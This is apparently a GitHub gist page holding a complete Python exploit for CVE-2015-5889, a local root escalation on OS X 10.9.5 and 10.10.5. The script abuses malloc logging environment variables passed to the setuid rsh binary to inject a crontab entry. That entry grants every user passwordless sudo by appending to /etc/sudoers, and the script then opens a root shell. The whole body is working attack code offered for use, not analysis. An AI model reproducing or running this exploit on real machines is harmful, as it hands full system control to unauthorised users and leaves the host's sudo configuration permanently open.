Created
November 2, 2015 04:01
-
-
Save Saren-Arterius/827c5a1912123c3a6563 to your computer and use it in GitHub Desktop.
10.10.5 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root | |
| # tested on osx 10.9.5 / 10.10.5 | |
| # jul/2015 | |
| # by rebel | |
| import os,time,sys | |
| env = {} | |
| s = os.stat("/etc/sudoers").st_size | |
| env['MallocLogFile'] = '/etc/crontab' | |
| env['MallocStackLogging'] = 'yes' | |
| env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' | |
| sys.stderr.write("creating /etc/crontab..") | |
| p = os.fork() | |
| if p == 0: | |
| os.close(1) | |
| os.close(2) | |
| os.execve("/usr/bin/rsh",["rsh","localhost"],env) | |
| time.sleep(1) | |
| if "NOPASSWD" not in open("/etc/crontab").read(): | |
| sys.stderr.write("failed\n") | |
| sys.exit(-1) | |
| sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") | |
| while os.stat("/etc/sudoers").st_size == s: | |
| sys.stderr.write(".") | |
| time.sleep(1) | |
| sys.stderr.write("\ndone\n") | |
| os.system("sudo su") | |
| # 0day.today [2015-11-02] # |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment